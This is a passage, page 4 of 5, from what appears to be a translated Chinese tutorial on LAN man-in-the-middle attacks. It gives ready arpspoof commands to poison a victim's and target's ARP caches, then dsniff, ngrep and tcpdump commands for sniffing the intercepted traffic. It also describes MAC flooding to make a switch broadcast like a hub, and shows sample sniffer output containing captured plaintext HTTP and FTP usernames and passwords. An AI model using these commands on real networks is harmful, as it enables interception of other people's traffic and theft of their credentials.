Setup:
Attacker (IP: 2.2.2.2)
Victim (IP: 1.1.1.1) <-> Target (IP: 0.0.0.0)
Term A:
# arpspoof -t 1.1.1.1 0.0.0.0 &>/dev/null &
# arpspoof -t 0.0.0.0 1.1.1.1 &>/dev/null &
Term B:
# dsniff | less
-OR-
# ngrep host 1.1.1.1 | less
-OR-
# tcpdump host 1.1.1.1 and not arp | less
|
如果万事皆备,接着通过使用条款B中三个可选择的程序,你应该可以嗅探所有被攻击者和目标/目的地间被发送的传输。
如果最后一些事情没有象计划中那样,那么可能有几个原因。一个原因可能是被攻击者有静态ARP表,它拒绝ARP高速缓存表中的入口覆盖。另一个可能的原因是一个类似于ARPWatch的侦察系统,它是一个ethernet/ip监视系统。提醒一下,这个特殊的MITM攻击在加密协议中不能工作。在第2段中有解释。
3.5 包嗅探
如果网络是通过一个hub分段的而不是一个交换机,在一个局域网(LAN)中嗅探是非常容易的。唯一的区别是一个交换在发送包的时候被组织,因此有资格称为”交换”因为它在相应的目的地之间交换包。另一方面,一个hub盲目自由的在整个网络上广播包而不对任何特定的目的地。
显然通过采用一个MAC洪水攻击可能在一个交换机环境下嗅探。在3.1b部分大概解释了MAC地址洪水攻击。
MAC洪水攻击的一个结果是,交换机将象一个hub,而且允许整个网络被嗅探。这给了你一个机会使用你可以使用的任何类别的嗅探软件来嗅探网络,收集包。一些流行的嗅探软件和程序包括:Dug Song 写的DSniff,LinSniffer (一个流行的版本是humble of rhino9写的LinSniffer 0.666), FX写的PHoss 和 Alberto Ornaghi, Marco Valleri 写的Ettercap 。
PHoss输出的一个例子:
[root@genii sniff]# ./PHoss
PHoss (Phenoelit's own security sniffer)
(c) 1999 by Phenoelit (http://www.phenoelit.de)
$Revision: 1.13 $
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
Source: 192.168.1.100:40895
Destination: 72.14.0.99:80
Protocol: HTTP
Data: asrtrin:manheim
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
Source: 192.168.1.105:46537
Destination: 72.14.0.99:21
Protocol: FTP
Data: buddy:holly
[...]
|
TCPDump 3.9.4 输出的一个例子(输出不是一样的):
[root@genii sniff]# tcpdump -vvX port 21
tcpdump: listening on eth0, link-type EN10MB (Ethernet),
capture size 96 bytes
[...]
00:45:40.370082 IP (tos 0x0, ttl 111, id 43980, offset 0,
flags [DF], proto: TCP (6), length: 57) localhost.pirhana >
localhost.ftp: P, cksum 0x434b (correct), 1:18(17) ack 38
win 17483
4500 0039 abcc 4000 6f06 79e6 44ad 954f E..9..@.o.y.D..O
5056 bbb9 11f9 0015 6595 ed3d 6f7f 82e1 PV......e..=o...
5018 444b 434b 0000 5553 4552 206d 7975 P.DKCK..USER.myu
7365 726e 616d 650d 0a sername..
[...]
|
共5页: 上一页 [1] [2] [3] 4 [5] 下一页
|
